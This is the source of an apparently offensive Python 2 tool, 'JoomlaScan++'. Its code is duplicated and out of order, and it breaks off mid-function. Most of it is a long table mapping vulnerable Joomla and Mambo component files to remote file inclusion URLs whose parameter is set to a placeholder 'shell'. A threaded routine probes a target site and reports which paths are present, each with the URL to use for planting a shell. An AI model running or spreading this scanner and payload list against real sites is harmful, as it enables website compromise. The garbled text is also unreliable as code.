"akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell",
"administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell",
"administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell",
"administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell",
"components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell",
"components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell",
"administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell",
"components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell",
"administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell",
"components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell",
"administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell",
"components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell",
"administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell",
"administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell",
"administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell",
"administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell",
"administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell",
"components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell",
"administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell",
"administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell",
"components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell",
"components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ",
"components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell",
"components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell",
"administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell",
"administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell",
"administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell",
"components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell",
"components/com_madeira/img.php" : "img.php?url=shell",
"components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell",
"components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell",
"administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell",
"administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell",
"components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell",
"components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell",
"administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell",
"administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell",
"components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell",
"com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell",
"index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell",
"component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell",
"administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell",
"index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell",
"administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell",
"administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell",
"administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell",
"administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell",
"administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"}
def usage():
print """\tUsage: ./joomlascan.py
\t[options]
\t -p/--proxy : Add proxy support
\t -e/--errors : Show Error responses
\t -j : path to joomla if needed
Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080
"""
sys.exit(1)
def testproxy(proxy):
try:
httplib.HTTPConnection(proxy).connect()
except:
print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!"
time.sleep(3)
globals()['proxy']=''
def testhost(host):
try:
httplib.HTTPConnection(host).connect()
except:
print "Host down, or you're an idiot! Either way, I'm out of here!"
sys.exit(1)
def runattack(apath,shell):
proxy=globals()['proxy']
host=globals()['host']
path=globals()['joomlapath']
p404=globals()['p404']
#print "Apath:",apath,"- Shell:",shell
if proxy:
h=httplib.HTTP(proxy)
h.putrequest("GET", "http://"+host+"/"+path+"/"+apath)
else:
h=httplib.HTTP(host)
h.putrequest("HEAD", "/"+path+"/"+apath)
h.putheader("Host", host)
h.endheaders()
try:
status, reason, headers = h.getreply()
if status==200:
print 'Found: '+apath+': Use Shell: '+shell
elif p404:
print 'Not Found:',apath,status,reason
except(), msg:
print "Error Occurred:",msg
pass
if __name__=="__main__":
import getopt,sys
print "\n\tJoomlaScan++ - Now Not As Ghey!"
print "\t--------------------------------------------"
try:
opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="])
except getopt.GetoptError, err:
usage()
socket.setdefaulttimeout(6)
p404=False
proxy=''
host=''
joomlapath=''
for o, a in opts:
if o == "-v":
verbose = True
elif o in ("-h", "--help"):
usage()
elif o in ("-p", "--proxy"):
proxy=a
elif o in ("-e","--errors"):
p404=True
elif o in ("-j","--joomlapath"):
joomlapath=a
else:
usage()
if args:
host=args[0]
else:
usage()
if proxy:
testproxy(proxy)
testhost(host)
attackpool=ThreadPool(20)
for item in paths.items():
attackpool.putRequest(WorkRequest(runattack,item))
print "Main thread working..."
while 1:
try:
attackpool.poll()
time.sleep(0.5)
except (KeyboardInterrupt):
print "User Break... Exiting..."
break
except (NoResultsPending):
print "Scan Finished: Exiting."
break
import httplib,time,socket
import threading, Queue
class NoResultsPending(Exception):
"""All work requests have been processed."""
pass
class NoWorkersAvailable(Exception):
"""No worker threads available to process remaining requests."""
pass
class WorkerThread(threading.Thread):
"""Background thread connected to the requests/results queues.
A worker thread sits in the background and picks up work requests from
one queue and puts the results in another until it is dismissed.
"""
def __init__(self, requestsQueue, resultsQueue, **kwds):
"""Set up thread in damonic mode and start it immediatedly.
requestsQueue and resultQueue are instances of Queue.Queue passed
by the ThreadPool class when it creates a new worker thread.
"""
threading.Thread.__init__(self, **kwds)
self.setDaemon(1)
self.workRequestQueue = requestsQueue
self.resultQueue = resultsQueue
self._dismissed = threading.Event()
self.start()
def run(self):
"""Repeatedly process the job queue until told to exit.
"""
while not self._dismissed.isSet():
# thread blocks here, if queue empty
request = self.workRequestQueue.get()
if self._dismissed.isSet():
# return the work request we just picked up
self.workRequestQueue.put(request)
break # and exit
# XXX catch exceptions here and stick them to request object
self.resultQueue.put(
(request, request.callable(*request.args, **request.kwds))
)
def dismiss(self):
"""Sets a flag to tell the thread to exit when done with current job.
"""
self._dismissed.set()
class WorkRequest:
"""A request to execute a callable for putting in the request queue later.
See the module function makeRequests() for the common case
where you want to build several work requests for the same callable
but different arguments for each call.
"""
def __init__(self, callable, args=None, kwds=None, requestID=None,
callback=None):
"""A work request consists of the a callable to be executed by a
worker thread, a list of positional arguments, a dictionary
of keyword arguments.
A callback function can be specified, that is called when the results
of the request are picked up from the result queue. It must accept
two arguments, the request object and it's results in that order.
If you want to pass additional information to the callback, just stick
it on the request object.
requestID, if given, must be hashable as it is used by the ThreadPool
class to store the results of that work request in a dictionary.
It defaults to the return value of id(self).
"""
if requestID is None:
self.requestID = id(self)
else:
self.requestID = requestID
self.callback = callback
self.callable = callable
self.args = args or []
self.kwds = kwds or {}
class ThreadPool:
"""A thread pool, distributing work requests and collecting results.
See the module doctring for more information.
"""
def __init__(self, num_workers, q_size=0):
"""Set up the thread pool and start num_workers worker threads.
num_workers is the number of worker threads to start initialy.
If q_size > 0 the size of the work request is limited and the
thread pool blocks when queue is full and it tries to put more
work requests in it.
"""
self.requestsQueue = Queue.Queue(q_size)
self.resultsQueue = Queue.Queue()
self.workers = []
self.workRequests = {}
self.createWorkers(num_workers)
def createWorkers(self, num_workers):
"""Add num_workers worker threads to the pool."""
for i in range(num_workers):
self.workers.append(WorkerThread(self.requestsQueue,
self.resultsQueue))
def dismissWorkers(self, num_workers):
"""Tell num_workers worker threads to to quit when they're done."""
for i in range(min(num_workers, len(self.workers))):
worker = self.workers.pop()
worker.dismiss()
def putRequest(self, request):
"""Put work request into work queue and save for later."""
self.requestsQueue.put(request)
self.workRequests[request.requestID] = request
def poll(self, block=False):
"""Process any new results in the queue."""
while 1:
try:
# still results pending?
if not self.workRequests:
raise NoResultsPending
# are there still workers to process remaining requests?
elif block and not self.workers:
raise NoWorkersAvailable
# get back next results
request, result = self.resultsQueue.get(block=block)
# and hand them to the callback, if any
if request.callback:
request.callback(request, result)
del self.workRequests[request.requestID]
except Queue.Empty:
break
def wait(self):
"""Wait for results, blocking until all have arrived."""
while 1:
try:
self.poll(True)
except NoResultsPending:
break
def makeRequests(callable, args_list, callback=None):
"""Convenience function for building several work requests for the same
callable with different arguments for each call.
args_list contains the parameters for each invocation of callable.
Each item in 'argslist' should be either a 2-item tuple of the list of
positional arguments and a dictionary of keyword arguments or a single,
non-tuple argument.
callback is called when the results arrive in the result queue.
"""
requests = []
for item in args_list.items():
if item == isinstance(item, tuple):
requests.append(
WorkRequest(callable, item[0], item[1], callback=callback))
else:
requests.append(
WorkRequest(callable, [item], None, callback=callback))
return requests
paths = {"components/com_flyspray/startdown.php" : "startdown.php?file=shell",
"administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell",
"components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell",
"components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell",
"components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell",
"components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ",
"components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell",
"components/com_forum/download.php" : "download.php?phpbb_root_path=shell",
"components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell",
"components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell",
"components/minibb/index.php" : "index.php?absolute_path=shell",
"components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=",
"modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ",
"components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ",
"components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell",
"components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell",
"components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell",
"administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell",
"administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell",
"administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell",
"components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell",
"components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell",
"components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell",
"components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell",
"akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell",
"administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell",
"administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell",
"administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell",
"components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell",
"components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell",
"administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell",
"components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell",
"administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell",
"components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell",
"administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell",
"components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell",
"administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell",
"administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell",
"administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell",
"administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell",
"administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell",
"components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell",
"administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell",
"administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell",
"components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell",
"components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ",
"components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell",
"components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell",
"administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell",
"administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell",
"administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell",
"components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell",
"components/com_madeira/img.php" : "img.php?url=shell",
"components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell",
"components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell",
"administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell",
"administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell",
"components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell",
"components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell",
"administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell",
"administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell",
"components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell",
"com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell",
"index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell",
"component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell",
"administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell",
"index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell",
"administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell",
"administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell",
"administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell",
"administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell",
"administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"}
def usage():
print """\tUsage: ./joomlascan.py
\t[options]
\t -p/--proxy
\t -e/--errors : Show Error responses
\t -j : path to joomla if needed
Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080
"""
sys.exit(1)
def testproxy(proxy):
try:
httplib.HTTPConnection(proxy).connect()
except:
print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!"
time.sleep(3)
globals()['proxy']=''
def testhost(host):
try:
httplib.HTTPConnection(host).connect()
except:
print "Host down, or you're an idiot! Either way, I'm out of here!"
sys.exit(1)
def runattack(apath,shell):
proxy=globals()['proxy']
host=globals()['host']
path=globals()['joomlapath']
p404=globals()['p404']
#print "Apath:",apath,"- Shell:",shell
if proxy:
h=httplib.HTTP(proxy)
h.putrequest("GET", "http://"+host+"/"+path+"/"+apath)
else:
h=httplib.HTTP(host)
h.putrequest("HEAD", "/"+path+"/"+apath)
h.putheader("Host", host)
h.endheaders()
try:
status, reason, headers = h.getreply()
if status==200:
print 'Found: '+apath+': Use Shell: '+shell
elif p404:
print 'Not Found:',apath,status,reason
except(), msg:
